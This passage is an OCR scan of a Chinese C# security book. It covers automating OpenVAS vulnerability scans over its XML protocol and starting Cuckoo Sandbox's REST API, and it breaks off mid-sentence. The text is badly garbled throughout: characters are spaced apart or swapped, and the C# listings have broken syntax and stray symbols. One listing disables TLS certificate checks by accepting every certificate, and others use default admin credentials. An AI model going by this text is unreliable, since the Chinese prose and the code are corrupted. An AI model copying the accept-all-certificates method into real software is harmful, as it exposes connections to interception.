我 们 使 用 如 清单 7-6 所 示 的 ReadMessage () 方法 读 取 服务 器 返回 的 消息 。 


清单 7-6: 用 于 读 取 OpenVAS 返 回信 息 的 ReadMessage () 方法 


private XDocument ReadMessage(SslStream @sslStream) 


{ 


using (var stream = new @MemoryStream()) 


int bytesRead = 0; 
©@do 
{ 


ee 


byte[ | buffer = new byte[2048 ] ; 

bytesRead = sslStream.@Read(buffer, 0, buffer.Length); 
stream.Write(buffer, 0, bytesRead); 

if (bytesRead < buffer.Length ) 


@try 


string xml = System.Text.Encoding.ASCIIT.GetString(stream.ToArray()); 


return XDocument.Parse(xml); 


} 


catch 


{ 


@continue; 


} 
} 


} 
while (bytesRead > 0); 


return null; 


} 


这 个 万 法 按照 块 的 方式 从 TCP 流 中 读 取 XML 文 档 ， 将 文档 (或 nul 返回 给 调用 者 。 在 将 sslstream@ 传 给 该 万 法 后 ， 我 们 
声明 了 一 个 MemoryStream 变 量 @， 用 该 变量 来 动态 地 存储 从 服务 器 接收 的 数据 。 随 后 ， 声 明 一 个 整数 变量 来 保存 读 取 的 字 节 
数 ， 用 do/while 循 环 @) 创 建 一 个 2048 字 节 的 缓冲 区 来 保存 读 取 的 数据 。 然 后 ， 对 SslStream 调 用 Read () @， 用 从 流 中 读 取 的 
字 节 数 填 充 缓冲 区 ， 然 后 用 Write () 把 从 OpenVAS 得 到 的 数据 复制 给 MemoryStream， 后 续 这 些 数据 将 被 解析 为 XML。 


如 果 服 务 器 返回 的 数据 比 缓冲 区 可 容纳 的 数据 少 ， 就 需要 检查 一 下 看 看 是 否 从 服务 器 读 到 了 一 个 有 效 的 XML 文档 。 要 完成 
项 工作 ， 我 们 在 一 个 trycatch 块 @ 中 使 用 Getstring () ，Getstring () 将 存储 在 MemoryStream 中 的 字 节 转换 为 可 解析 的 
符 串 ， 并 类 试 解析 这 个 XML。 如 果 XML 无 效 ， 解 析 将 抛 出 一 个 异常 。 如 果 没 有 抛 出 任何 异常 ， 就 返回 得 到 的 XML 文档 。 如 果 
抛 出 了 异常 ， 就 说 明 我 们 没有 从 流 中 读 完 所 有 字 节 ， 因 此 需 调 用 continue@@ 继 续 读 取 更 多 数据 。 如 果 从 流 读 完了 所 有 字 节 ， 但 

能 读 到 完整 


仍 没有 返回 一 个 有 效 的 XML 文档 ， 则 返回 null。 这 是 一 个 预防 措施 ， 以 防 在 与 OpenVAS 的 通信 过 程 中 通信 丢失 而 不 能 读 到 完 
的 API 响 应 。 因 为 只 有 在 不 能 读 到 整个 XML 响应 的 时 候 才 会 返回 null， 所 以 返回 null 有 助 于 我 们 随后 检查 OpenVASs 返 回 的 响应 是 


人 否 有 效 。 


这 
字 


7.3.4 ”建立 友 送 /接收 命令 的 TCP 流 
清单 7-7 列 出 了 GetStream () 方法 ， 这 个 方法 第 一 次 出 现在 清单 7-3 中 。GetStream () 方法 与 OpenVAS 服 务 器 建立 一 个 
真实 的 TCP 连 接 ， 我 们 用 这 个 连接 发 送 与 接收 命令 。 


清单 7-7: OpenVASSession 构 造 疯 数 的 GetStream () 方法 


private void GetStream() 


lL 


if ( stream == null || ! stream.CanRead) 


{ 
TcpClient client = new @TcpClient(this.ServerIPAddress.ToString(), this.ServerPort); 


_stream = new @SslStream(client.GetStream(), false, 
new RemoteCertificateValidationCallback (ValidateServerCertificate), 
(sender, targetHost, localCertificates, remoteCertificate, acceptablelssuers) => null]l); 


_stream.@AuthenticateAsClient("OpenVAS", null, SslProtocols.Tls, false); 


} 
. 


GetStream () 方法 建 YV 了 一 个 TCP 流 ， 类 的 其 他 部 分 在 与 OpenVAS 通 信 时 都 将 使 用 该 TCP 流 。 要 完成 这 项 工作 ， 如 果 流 
无 效 ， 我 们 需要 把 ServerlPAddress 和 ServerPort 属 性 传 给 TcpClient 类 ， 实 例 化 一 个 与 服务 器 通信 的 TcpClient 对 象 。 我 们 在 
SslStream 中 封 闪 该 流 ， 由 于 SSL 证 书 是 自 签 名 的 并 能 抛 出 错误 ， 所 以 SslStream 将 不 验证 SSL 证 书 ; 然后 调用 
AuthenticateAsClient () @ 来 执行 SSL 握 手 。 完 成 上 述 工作 后 ， 该 方法 的 其 他 部 分 束 可 使 用 这 个 到 OpenVAS 服 务 器 的 TCP 流 
反 送 命令 和 接收 响应 了 。 


7.3.5 ”证 书 有 效 性 及 碎片 回收 


清单 7-8 给 出 了 验证 SSL 证 书 (因为 OpenVAS 上 默认 使 用 的 SSL 证 书 是 上 自 签约 的 ) 有 效 性 并 在 结束 后 清理 会 话 的 方法 。 


清单 7-8: ValidateServiceCertificate () 与 Dispose () 方法 


private bool ValidateServerCertificate(object sender, X509Certificate certificate, 
X509Chain chain, SslPolicyErrors sslPolicyErrors) 
{ 


return @true; 


} 


public void Dispose() 


if ( stream != null) 
@ stream.Dispose(); 


} 
通 党 验证 证 书 时 很 少 能 返回 true@H， 但 是 对 于 我 们 的 应 用 场景 而 言 ， 由 于 OpenVAS 使 用 原本 束 无 效 的 目 签名 SSL 证 书 ， 


此 应 允许 所 有 证 书 。 如 前 例 所 示 ， 我 们 创建 Dispose () 方法 ， 用 其 在 处 理 完 网 络 或 文件 流 后 完成 清理 工作 。 如 果 
OpenVASSession 类 中 的 流 不 是 null， 我 们 就 释放 用 来 与 OpenVAS 通 信 的 内 置 流 @。 


7.3.6 ”获取 OpenVAS 版 本 


如 清单 7-9 所 示 ， 现 在 我 们 可 太 送 命令 调用 OpenVAs 并 获取 响应 。 举 例 来 说 ， 我 们 可 执行 诸如 get _ version 之 类 的 命令 ， 该 
命令 返回 OpenVAS 实 例 的 版 本 人 信息。 随后， 我 们 将 在 OpenVASManager 类 中 封 沪 类 似 功 能 。 


清单 7-9: 获取 OpenVAS 当 前 版 本 的 Main () 方法 


class MainClass 


{ 


public static void Main(string[ | args) 


{ 


Using (OpenVASSession session = new @OpenVASSession("admin", "admin", "192.168.1.19")) 


XDocument doc = session.@ExecuteCommand( 
XDocument.Parse("<get Version />")); 


Console.WritelLine(doc.ToString()); 


} 
} 
} 


通过 传 入 用 户 名 、 密 码 和 主机 信息 ， 我 们 创建 了 一 个 OpenVASSession 对 象 @。 接 着 ， 向 ExecuteCommand () 方法 @ 传 
递 一 个 请 求 OpenVAs 版 本 的 XDocument 对 象 ， 将 返回 结果 保存 在 一 个 新 的 XDocument 对 象 中 ， 最 后 在 屏幕 上 输出 结果 。 清 单 
7-9 的 输出 如 清单 7-10 所 示 。 


清单 7-10: OpenVAS 对 <get version/> 的 响应 


<get version response status="200" status text="OK"> 
<version>6.0</version> 
</get version response> 


17.4 OpenVASManager 类 


我 们 将 用 OpenVASManager 类 (如 清单 7-11 所 示 ) 来 封 半 API 调 用 来 局 动 扫 朱 、 监 控 扫 摘 并 且 得 到 扫 摘 的 结 


清单 7-11: OpenVASManager 的 构造 图 数 以 及 GetVersion () 方法 


public class OpenVASManager : IDisposable 
{ 
private OpenVASSession session; 
public OpenVASManager(OpenVASSession @session) 
{ 
if (session != null) 
session = session; 
else 
throw new ArgumentNullException("session"); 


} 
public XDocument @CGetVersion() 
{ 
return session.ExecuteCommand(XDocument.Parse("<get Version />")); 
} 
private void Dispose() 
I 
_session.Dispose(); 
} 
} 


OpenVASManager 类 的 构造 疯 数 有 一 个 参数 ， 即 OpenVASSessionQ@。 如 果 传 给 该 参数 的 会 话 值 是 null， 因 为 没有 一 个 有 
效 的 会 话 我 们 不 能 与 OpenVAS 通 信 ， 所 以 将 会 抛 出 一 个 异常 。 反 之 ， 我 们 将 会 话 赋 给 一 个 本 地 类 变量 ， 从 而 可 在 诸如 
GetVersion () 之 类 的 类 方法 中 使 用 。 清 单 7-9 是 实现 的 获取 OpenVAS 版 本 的 Getvesion () 方法 @ 以 及 Dispose () 方法 。 


如 清单 7-12 所 示 ， 现 在 我 们 要 检索 OpenVAS 的 版 本 ， 可 在 Main () 方法 中 用 Open-VASManager 来 代 蔡 调用 
ExcecuteCommand () 的 代码 。 


清单 7-12: 用 OpenVASManager 类 检索 OpenVAS 版 本 的 Main () 方法 


public static void Main(string[ | args ) 


{ 
using (OpenVASSession session = new OpenVASSession("admin", "admin", "192.168.1.19")) 


using (OpenVASManager manager = new OpenVASManager(session)) 


XDocument version = manager.GetVersion(); 
Console.WriteLine(version); 


} 
} 
} 


由 于 利用 一 个 便捷 的 万 法 调用 对 其 进行 了 抽 稼 ， 程序 员 再 也 不 用 记 住 获取 版 本 信息 所 需 的 XML。 对 其 他 的 API 命 令 也 可 采用 
同样 的 万 式 调用 。 


7.4.1 获取 扫 摘 配 置 并 创建 目标 


清单 7-13 列 出 我 们 如 何在 OpenVAsManager 中 执行 命令 来 创建 一 个 新 的 扫 摘 目标 并 检索 扫 摘 配置 。 


清单 7-13: OpenVAS 的 GetScanConfigurations () 与 CreateSimpleTager () 方法 


public XDocument GetScanConfigurations() 


{ 


return session.ExecuteCommand(XDocument.Parse(@"<get configs />")); 


} 


public XDocument CreateSimpleTarget(string cidrRange, string targetName) 
{ 
XDocument createTargetXML = new XDocument( 
new XElement(@"create target", 
new XElement("name", targetName), 
new XElement("hosts", cidrRange))); 
return session.ExecuteCommand(createTargetXML ) ; 


} 


GetScanConfigurations () 方法 向 OpenVAS 传 递 <get configs/> 命 令 @ 并 返回 啊 应 。Create-SimpleTarget () 方法 接 
收 IP 地 址 或 CIDR 沁 围 (比如 192.168.1.0/24) 参数 以 及 一 个 目标 名 ,利用 这 些 信 息 使 用 XDocument 和 XElement 构 建 一 个 XML 
文档 。 第 一 个 XElement 创 建 一 个 create_target@ 的 根 XML 书 点 。 剩 下 两 个 包含 目标 的 名 称 及 其 包含 的 主机 。 清 单 7-14 列 出 了 生 
成 的 XML 文档 。 


清单 7-14: OpenVAS create target 命 令 生 成 的 XML 文档 


《CITeate target> 
<name>Home Network</name> 
<hosts>192.168.1.0/24</hosts> 
</create target> 


清单 7-15 列 出 了 如 何 创 建 目 标 ， 并 用 Discovery 扫 摘 配 置 对 其 进行 扫 摘 。Discovery 扫 摘 配 置 执 行 基本 的 彰 口 扫 摘 和 其 他 基 
本 网 络 测试 。 


清单 7-15: 创建 一 个 OpenVAS 目 标 并 检索 扫 摘 配置 1D 


XDocument target = manager.@CreateSimpleTarget("192.168.1.31", Guid.NewGuid().ToString()); 
string targetID = target.Root.Attribute("id").@Value; 

XDocument configs = manager.GetScanConfigurations(); 

string discoveryConfigID = string.Empty; 


foreach (XElement node in configs.Descendants("name")) 


if (node.Value == ©@"Discovery") 
{ 
discoveryConfigID = node.Parent.Attribute ("id").Value; 
break; 
} 
l 


Console.@WriteLine("Creating scan of target 
discoveryConfigID ) ; 


+ targetID + ”With scan config " + 


首先 ， 通 过 传 入 要 扫描 的 IP 地 址 和 一 个 用 作 模 板 名 称 的 GUID， 创 建 要 用 CreateSimpleTarget () Q@ 扫 描 的 目标 。 为 了 自动 
化 起 见 ， 目 标 并 不 需要 一 个 可 读 性 强 的 名 字 ， 只 需 为 名 字 生 成 一 个 Guid 即 可 。 


注意 : 在 未 来 ， 你 有 可 能 命名 一 个 目标 数据 库 或 工作 站 来 区 分 要 扫描 网 络 中 的 特定 计算 机 。 对 于 这 些 目 标 你 可 指定 特定 可 读 
性 强 的 名 衬 ， 但 是 每 个 目标 的 名 字 必 须 是 唯一 的 。 


成 功 创建 目标 后 的 啊 应 如 下 所 示 : 


《CITeate target response status= 201 status text= OK, resource CITeated 
1d= 254cd3ef-bbe1-4d58-859d-21b8d0c046c6 /> 


创建 目标 后 ， 可 从 XML 响 应 中 抓 取 id 属 性 的 值 并 保存 下 来 ， 后 续 需 要 获取 扫描 状态 时 就 可 使 用 该 值 。 接 下 来 调用 
GetScanConfiguratiaons () 来 检索 所 有 可 能 的 扫 摘 配 置 并 保 仓 下 来 ， 依 次 查询 直到 找到 称 为 Discovery 的 扫 拉 配置。 最 后 ， 
用 WriteLine () 在 屏幕 上 打印 输出 一 个 消息 ， 告 诉 用 户 这 个 扫描 将 使 用 哪 一 个 目标 和 扫描 配置 ID。 


创建 并 启动 任务 
如 何 用 OpenVASManager 类 创建 和 局 动 扫 摘 ， 如 清单 7-16 所 示 。 
清单 7-16: 创建 和 局 动 扫 摘 的 OpenVAs 方 法 


public XDocument @CreateSimpleTask(string name, string comment, Guid configID, Guid targetID ) 
{ 


XDocument createTaskXML = new XDocument( 
new XElement(@"create task", 

new XElement("name", name), 

new XElement("comment", comment), 

new XElement("config", 
new XAttribute(@"id", configID.ToString())), 
new XElement("target", 

new XAttribute("id", targetID.ToString()))),); 


return session.ExecuteCommand(createTaskXML); 


public XDocument @StartTask(Guid taskID) 
{ 


XDocument startTaskXML = new XDocument( 
new XElement(©@"start task", 
new XAttribute("task id", taskID.ToString()))); 


return session.ExecuteCommand(startTaskXML); 


} 


使 用 一 些 基本 信息 CreateSimpleTask () 方法 @ 束 可 创建 一 个 新 任务 。 当 然 也 可 创建 非常 复杂 的 任务 配置 。 要 进行 一 个 基 
本 的 漏洞 扫 摘 ， 我 们 可 用 create task 根 元 素 @ 和 一 些 存 储 配 置信 息 的 子 元 素 构 建 一 个 向 单 的 XML 文档 。 前 面 两 个 子 元 素 是 任务 
的 名 字 和 注释 (或 描述 ) ， 接 下 来 是 作为 id 属性 @ 值 存储 的 扫 摘 配置 和 目标 元 素 。 创 建 宛 XML 后 ， 可 向 OpenVAs 友 大 
create task 命 令 并 返回 响应 。 


StartTask () 方法 @ 只 接受 一 个 参数 : 要 局 动 的 任务 ID。 首 先 用 属性 task id 创建 一 个 叫 作 start taskG@ 的 XML 元 素 。 
如 清单 7-17 所 示 ， 给 出 了 将 这 两 个 方法 加 到 Main () 中 的 方法 。 


清单 7-17: 创建 并 局 动 一 个 OpenVAS 任 务 


XDocument task = manager.CreateSimpleTask(Guid.NewGuid().ToString(), 
string.Empty, new Guid(discoveryConfigID), new Guid(targetID) ) ; 


Guid taskID = new Guid(task.Root.@Attribute("id").Value); 


manager.@StartTask(taskID); 


要 调用 CreateSimpleTask () ， 需 要 传递 如 下 参数 : 一 个 作为 任务 名 字 的 新 GUID、 一 个 空 的 注释 字符 串 ， 以 及 扫描 配置 
ID 和 目标 ID。 从 返回 的 XML 文 档 根 节点 获取 id 属 性 @， 也 就 是 任务 ID; 然后 将 其 传递 给 StartTask () @ 来 启动 OpenVAS 扫 


摘 。 
监控 扫 摘 并 获取 扫 摘 结 


为 了 监控 扫描 ， 我 们 实现 了 GetTask () 和 GetTaskResults () 方法 ， 如 清单 7-18 所 示 。 首 先 实 现 的 GetTasks () 方法 返 
回 一 个 任务 列表 及 其 状态 ， 使 我 们 可 监控 扫描 直至 结束 。GetTaskResults () 方法 返回 给 定 任务 的 扫描 结果 使 我 们 可 查看 
OpenVAS 发 现 的 所 有 漏洞 。 


清单 7-18: 用 来 获取 当前 任务 列表 以 及 检索 给 定 任务 结果 的 OpenVASManager 方 法 


public XDocument GetTasks(Guid? taskID = @null]l) 


if (taskID != null) 
return session.ExecuteCommand(new XDocument( 
new XElement("get tasks", 
new @XAttribute("task id", taskID.ToString())))); 


return _session.ExecuteCommand(@XDocument.Parse("<get tasks />")); 


} 


public XDocument GetTaskResults(Guid taskID) 


{ 
XDocument getTaskResultsXML = new XDocument( 


new @XElement("get results", 
new XAttribute("task id", taskID.ToString()),)); 


return session.ExecuteCommand(getTaskResultsXML); 


} 


GetTask () 方法 有 一 个 可 选 的 参数 ， 默 认 是 nullD。 根 据 传 入 的 task1D 参 数 是 否 为 null，GetTask () 方法 返回 所 有 当前 
的 任务 或 仅仅 返回 某 个 任务 。 如 果 传 入 的 任务 ID 不 是 null， 则 用 传 入 的 任务 ID 的 task_id@ 属 性 创建 一 个 叫 作 get_tasks 的 XML 元 
素 ; 然后 向 OpenVAS 发 送 get_tasks 命 令 并 返回 响应 。 如 果 ID 是 null， 则 用 XDocument.Parse () 方法 @ 创 建 一 个 未 指定 要 获 
取 ID 的 新 的 get_tasks 元 素 ; 然后 执行 命令 并 返回 结果 。 


除了 其 唯一 的 参数 不 可 选 之 外 ，GetTaskResults () 方法 运行 方式 与 GetTasks() 方法 类 似 。 利 用 参数 传 入 的 ID， 用 
task_id 属 性 创建 一 个 get_results XML 节 点 @@。 将 这 个 XML 节 点 传 给 ExcuteCommand () 之 后 ， 返 回响 应 。 


7.4.2 ” 封 小 自动 化 技术 


如 清单 7-19 所 示 ， 可 用 上 面 实现 的 方法 来 监控 扫 摘 并 检索 结果 。 在 调用 Session/Manager 类 的 Main () 方法 中 ， 可 增加 下 


面 的 代码 来 完成 目 动 化 。 
清单 7-19: 监控 OpenVAS 扫 描 直至 结束 ， 然 后 检索 扫描 结果 并 打印 输出 


XDocument status = manager.@GetTasks(taskID); 


while (status.@Descendants("status").First().Value != "Done") 


{ 
Thread. Sleep(5000); 


Console.Clear(); 

string percentComplete = status.@Descendants("progress").First().Nodes() 
.OfType<XText>().First().Value; 

Console.WriteLine("The scan is ”+ percentComplete + "% done."); 

status = manager.@GetTasks(taskID); 


} 
XDocument results = manager.@GetTaskResults(taskID); 
Console.WriteLine(results.ToString()); 


通过 传 入 前 面 保存 的 任务 ID 调用 GetTasks () @@， 然 后 将 结果 保存 在 status 变 量 中 。 接 着 ， 对 XML 方 法 Descendats () @ 
使 用 LINQ， 查 看 XML 文 档 中 的 status 节 点 是 否 为 Done，Done 即 表示 扫描 已 结束 。 如 果 扫 描 未 结束 ， 就 调用 Sleep () 等 待 五 
秒 钟 ， 然 后 清空 控制 台 屏 幕 。 接 着 用 Descendants () @ 检 索 progress 节 点 来 获取 扫描 完成 的 百分比 ， 打 印 输出 百分比 ， 再 次 
用 GetTasks () @ 询 问 OpenVAS 获 取 当 前 状态 。 如 此 循环 往复 直至 扫描 结束 。 


扫描 结束 之 后 ， 利 用 传 入 的 任务 ID 调 用 GetTaskResults () @; 接着 保存 包含 扫描 结果 的 XML 文 档 并 在 控制 台 屏 幕 上 打 JED 
输出 。 该 文档 包括 一 系列 有 用 的 信息 ， 包 括 所 检测 的 主机 及 开放 的 端口 、 扫 拉 主 机 上 已 知 的 活动 服务 ， 以 及 其 他 已 知 漏洞 ， 比 如 
软件 的 老 版 本 。 


7.4.3 运行 目 动 化 操作 


扫描 需要 一 段 时 间 ， 这 取决 于 运行 OpenVAS 的 机 器 状况 和 网 络 速度 。 在 执行 的 时 候 ， 自 动 化 程序 将 显示 一 些 友好 消息 让 用 
户 知晓 当前 扫描 的 状态 。 成 功 的 输出 看 起 来 如 清单 7-20 所 示 ， 我 们 对 该 示例 做 了 大 幅 删 减 。 


清单 7-20: OpenVAS 自 动 化 操作 的 输出 示例 


The scan is 1% done. 
The scan is 8% done. 
The scan is 8% done. 
The scan is 46% done. 
The scan is 50% done. 
The scan is 58% done. 
The scan is 72% done. 
The scan is 84% done. 
The scan is 94% done. 
The scan is 98% done. 
<get results response status="200" status text="OK"> 
<result id= 57e9d1fa-7ad9-4649-914d-4591321d061a > 
<OWneITy> 
<name>admin< /name> 
</owner> 
--SNhip-- 
</result> 
</get results response> 


7.5 ”本 童 小 结 


本 章 展示 了 如 何 用 C# 内 置 的 网 络 类 来 自动 化 运行 OpenVAS， 介 绍 了 如 何 与 OpenVAS 创 建 SSL 连 接 ， 并 可 使 用 基于 XML 的 
OMP 协 议 通信 ， 如 何 创建 一 个 扫 摘 目标 、 检 索 可 能 的 扫描 配置 ， 并 局 动 对 某 个 特定 目标 的 扫 朱 ， 如 何 监控 扫 拉 进展 ， 并 最 终 得 
到 XML 格式 的 扫 摘 报 告 。 


使 用 这 些 基 本 的 模块 ， 可 修复 网 络 上 的 漏洞 ， 随 后 再 运行 一 次 新 扫描 确保 不 再 及 现 漏洞 。OpenVAs 扫 摘 器 是 一 个 非 营 强 大 
的 工具 ， 我 们 只 介绍 了 其 皮毛 。OpenVAS 不 断 更 新 漏洞 信息 ， 可 用 作 一 个 有 效 的 漏洞 管理 解决 方案 。 


下 一 步 ， 可 以 了 解 管理 用 于 SSH 认 证 漏洞 扫描 的 认证 信息 或 者 创建 定制 化 的 扫描 配置 来 检查 特定 策略 配置 。 所 有 这 些 ， 甚 至 
更 多 功能 ， 都 可 通过 OpenVAS 实 现 。 


第 8 昔 ”上 自动 化 运行 Cuckoo Sandbox 


Cuckoo Sandbox 是 一 个 开源 项 目 ， 它 允许 你 在 一 个 安全 的 虚拟 机 中 运行 恶意 软件 样本 ， 然 后 分 析 并 报告 恶意 软件 在 虚拟 
机 中 的 表现 ， 而 不 用 担心 恶意 软件 感染 实际 机 器 。 作 为 用 Python 编写 的 软件 ，Cuckoo Sandbox 还 提供 了 一 个 REST API， 人 允许 
程序 员 使 用 任何 语言 来 完全 自动 地 操作 Cuckoo 的 很 多 功能 ， 比 如 启动 沙 盒 、 运 行 恶 意 软件 以 及 获取 报告 。 本 章 将 用 C# 库 和 类 来 
实现 这 些 功能 ， 这 些 库 和 类 使 用 起 来 非常 容易 。 尽 管 如 此 ， 仍 有 很 多 工作 要 做 ， 比 如 在 用 C# 开 始 测试 并 运行 恶意 软件 样本 前 ， 
需要 建立 一 个 Cuckoo 使 用 的 虚拟 机 环境 。 如 要 下 载 Cuckoo Sandbox 或 要 了 和 解 该 项 目的 更 多 信息 ， 可 访 


问 https://www.cuckoosandbox.org/。 


8.1 ” 安 北 Cuckoo Sandbox 


由 于 不 同 操作 系统 则 的 指令 差别 很 大 ， 甚 至 跟 你 用 作 虚 拟 机 沙 盒 的 Windows 版 本 有 天 ， 因 此 本 章 不 涉及 安 半 Cuckoo 
Sandbox。 本 章 假设 你 已 经 用 一 个 Windows 客 户 机 正确 安 半 了 Cuckoo sandbox， 并 且 Cuckoo 具 备 完 整 的 功能 。 可 参照 
Cuckoo Sandbox 主 站 上 的 指导 手册 (http://docs.cuckoosandox.org/en/latest/installation/) ，Cuckoo Sandbox 主 站 上 
提供 了 有 关 该 软件 安 闪 以 及 配置 的 最 新 的 详细 文档 。 


在 开始 使 用 这 些 API 前 ， 建 议 对 Cuckoo Sandbox 自 带 的 conf/cuckoo.conf 文 件 进 行 一 下 调整 ， 将 默认 的 超时 配置 调 短 些 
(我 的 设置 是 15 秒 ) ， 这 将 使 得 测试 过 程 中 的 操作 更 快 也 更 容易 。 在 cuckoo.conf 文 件 中 ， 在 接近 底部 的 地 方 可 看 到 如 清单 8-1 
所 示 的 一 段 代码 。 


清单 8-1: cuckoo.conf 文 件 中 的 默认 超时 配置 部 分 


[timeouts | 

# Set the default analysis timeout expressed in seconds. This value will be 
# used to define after how many seconds the analysis will terminate unless 
# otherwise specified at submission. 

default = @120 


Cuckoo 测 试 的 默认 超时 时 间 是 120 秒 @@。 由 于 在 得 到 报告 前 需要 等 待 超时 ， 因 此 在 调试 过 程 中 ， 较 长 的 超时 时 间 可 能 会 使 
你 失去 验证 问题 是 否 修 复 的 耐心 。 对 我 们 的 目的 而 言 ， 将 这 个 值 设 置 为 15 ~ 30 秒 是 比较 合理 的 。 


8.2 手动 运行 Cuckoo Sandbox API 


与 Nessus 类 似 ，Cuckoo Sandbox 遭 循 REST 模 了 式 (如 果 需 要 复习 相 天 内 容 ， 请 参见 第 ?5 章 对 REST 的 摘 述 ) 。 然 
而 ，Cuckoo Sandbox API 要 比 Nessus API 简 单 得 多 ， 我 们 只 需 与 两 个 API 问 点 通信 。 为 了 做 到 这 些 ， 我 们 将 继续 使 用 
session/manager 模 式 ， 首 先 实现 CuckooSession 类 ， 这 个 类 实现 了 如 何 与 Cuckoo Sandbox API 通 信 。 但 是 在 开始 编写 代码 
前 ， 应 首先 检查 下 是 否 正确 地 安装 了 Cuckoo Sandbox。 


8.2.1 局 动 APl 


在 成 功 安装 后 ， 可 用 命令 ./cuckoo.py 在 本 地 启动 Cuckoo Sandbox， 如 清单 8-2 所 示 。 如 果 报 错 ， 确 保 你 用 来 测试 的 虚拟 
机 已 运行 。 


清单 8-2: 启动 Cuckoo Sandbox 管 理 器 


$ ./cuckoo.py 


eeee e eeeee e e eeeee eeeee 
8 88 88 88 8 8 888 88 
8e 8e 8 8e 8eee8e 8 88 8 
88 88 888 88 88 88 8 
88e8 88ee8 88e8 88 8 8eee8 8eee8 


Cuckoo Sandbox 2.0-rc2 
www.cuckoosandbox.org 
Copyright (c) 2010-2015 


Checking for updates... 
Good! You have the latest version available. 


2016-05-19 16:17:06,146 [lib.cuckoo.core.scheduler| INFO: Using "virtualbox" as machine manager 
2016-05-19 16:17:07,484 [1ib.cuckoo.core.scheduler| INFO: Loaded 1 machine/s 
2016-05-19 16:17:07,495 [lib.cuckoo.core.scheduler| INFO: Waiting for analysis tasks... 


成 功 局 动 Cuckoo 后 将 得 到 一 个 有 趣 的 ASCII 风 格 的 旗 标 ， 后 面 罕 接着 是 一 些 简洁 的 信息 行 ， 说 明 有 多 少 虚 拟 机 已 加 载 。 局 
动 Cuckoo 主 脚本 之 后 ， 接 着 需要 局 动 后 面 要 与 之 通信 的 API。 这 两 个 Python 脚本 需要 同时 运行 。cuckoo.py 脚 本 是 Cuckoo 
sandbox 后 面 的 引擎 。 如 清单 8-3 所 示 ， 如 果 不 局 动 cuckoo.py 融 局 动 api.py， 我 们 的 API 请 求 将 不 会 做 任何 事情 。 要 通过 API 使 
用 Cuckoo Sandbox，cuckoo.py 和 api.py 这 两 个 脚本 都 需要 执行 。 默 认 情 况 下 ，Cuckoo Sandbox API 在 8090 闯 口 监听 ， 如 清 
单 8-3 所 示 。 


清单 8-3: 运行 Cuckoo Sandbox 的 HTTP API 


$ utils/api.py @-H 0.0.0.0 
* Running on @http://0.0.0.0:8090/ (Press CTRL+C to quit) 


要 指定 监听 的 IP 地 址 (默认 情况 下 是 本 机 地 址 ) ， 可 使 用 utils/api.py 脚 本 的 -H 参 数 Q@)， 该 参数 告知 监听 API 请 求 要 使 用 的 IP 
地 址 ， 也 就 是 说 由 于 使 用 默认 的 端口 ， 系 统 所 有 的 网 络 接口 (包括 内 网 和 外 网 IP 地 址 ) 都 可 通过 8090 尊 口 通 信 。 启 动 完毕 后 ， 
将 在 屏幕 上 输出 Cuckoo API 监 听 的 URLO。 在 本 章 的 其 他 部 分 我 们 都 将 用 这 个 URL 来 和 API 通 信 从 而 调用 Cuckoo Sandbox。 


8.2.2 ”检查 Cuckoo 的 状态 


与 前 几 章 测试 其 他 API 的 方法 类 似 ， 可 用 命令 行 工具 curl| 测 试 来 确保 APl 安 站 正确 。 在 本 章 后 面 ， 将 发 起 类 似 的 API 请 求 来 创 
建 任务 ， 监 控 任 务 直 至 结束 ， 并 报告 文件 执行 时 如 何 运 转 。 如 清单 8-4 所 示 ， 首 先 看 看 如 何 用 curl 通 过 HTTP APl 来 以 JSON 格 陈 
检索 Cuckoo Sandbox 的 状态 信息 。 


清单 8-4: 用 curl 通 过 HTTP API 检 索 Cuckoo Sandbox 状 态 


$ curl http://127.0.0.1:8090/cuckoo/status 
{ 
"cpuload": | 
0.0， 
0.02， 
0.05 


]， 
"diskspace": { 
"analyses": { 
"free": 342228357120， 
"total": 486836101120， 
Used : 144607744000 
}， 
"binaries": { 
"free": 342228357120， 
"total": 486836101120， 
Used : 144607744000 
} 
}, 


"hostname": “fdsa-E7450 ， 
@ machines" : { 
-available : 1， 
“total’: 1 


}， 
“memory": 82.06295645686164， 


@"tasks": { 
"completed": 0， 
"pending": 0， 
“Teported : 3， 
Tunning : 0， 
"total": 13 

}， 


@"Vversion": "2.0-rc2" 


} 


状态 信息 非常 有 用 ， 其 中 详细 列举 了 Cuckoo Sandbox 系 统 的 很 多 方面 。 需 要 注意 的 是 状态 信息 里 面 的 聚合 任务 信息 @)， 
这 些 信息 给 出 了 Cuckoo 已 执行 或 正在 执行 的 任务 数量 。 尽 管 本 章 只 讨论 提交 文件 进行 分 析 ， 但 实际 上 任务 可 以 是 分 析 正 在 执行 
的 文件 或 者 根据 URL 打 开 的 Web 页 面 。 此 外 ， 还 可 看 到 用 于 分 析 的 可 用 虚拟 机 数量 @ 以 及 Cuckoo 的 当前 版 本 G@)。 


现在 APlI 已 局 动 并 且 正 在 运行 ,一切 都 棒 极 了 。 后 面 我 们 将 用 同样 的 状态 APlI 端 点 来 测试 所 编写 的 代码 ， 并 进一步 详细 讨论 
代码 所 返回 的 JSON。 现 在 ,我们 只 需 确 认 APlI 已 局 动 并 运行 。 


8.3 ”创建 CuckooSession 类 


既然 知道 APl| 已 正常 运行 ， 可 发 起 HTTP 请 求 并 获取 JSON 咱 应 ， 那 么 我 们 现在 就 可 以 开始 编写 程序 化 调用 Cuckoo Sandbox 
的 代码 。 一 旦 构建 完 基础 类 ， 就 可 提交 一 个 文件 ， 在 文件 运行 时 对 其 进行 分 析 ， 然 后 报告 结果 。 如 清单 8-5 所 示 ， 我 们 将 从 


Cuckoo-Session 类 开始 。 


清单 8-5: 创建 CuckooSession 类 


public class @CuckooSession 


L 
public CuckooSession@(string host, int port) 
I 
this.Host = host; 
this.Port = port; 
} 


public string @Host { get; set; } 
public int @Port { get; set; } 


为 简单 起 见 ， 我 们 在 创建 CuckooSession 类 Q@ 的 同时 创建 CuckooSession 构 造 函 数 。 构 造 函 数 有 了 两 个 参数 忆 。 第 一 个 是 
连接 的 主机 ， 第 二 个 是 API 监 听 的 主机 问 口 。 在 构造 滔 数 中 ， 作 为 参数 传 入 的 两 个 值 将 分 别 赋 给 构造 函数 后 面 定义 的 对 应 属性 
Host@ 和 Port@)。 接 下 来 ， 需 要 实现 CuckooSession 类 可 用 的 方法 。 


8.3.1 编写 ExecuteCommand () 方法 来 处 理 HTTP 请 求 


在 发 起 API 请 求 时 ，Cuckoo 预 期 处 理 两 类 HTTP 请 求 : 传统 的 HTTP 请 求 和 更 复杂 的 分 段 形 式 的 HTTP 请 求 ， 这 类 复杂 请 求 用 
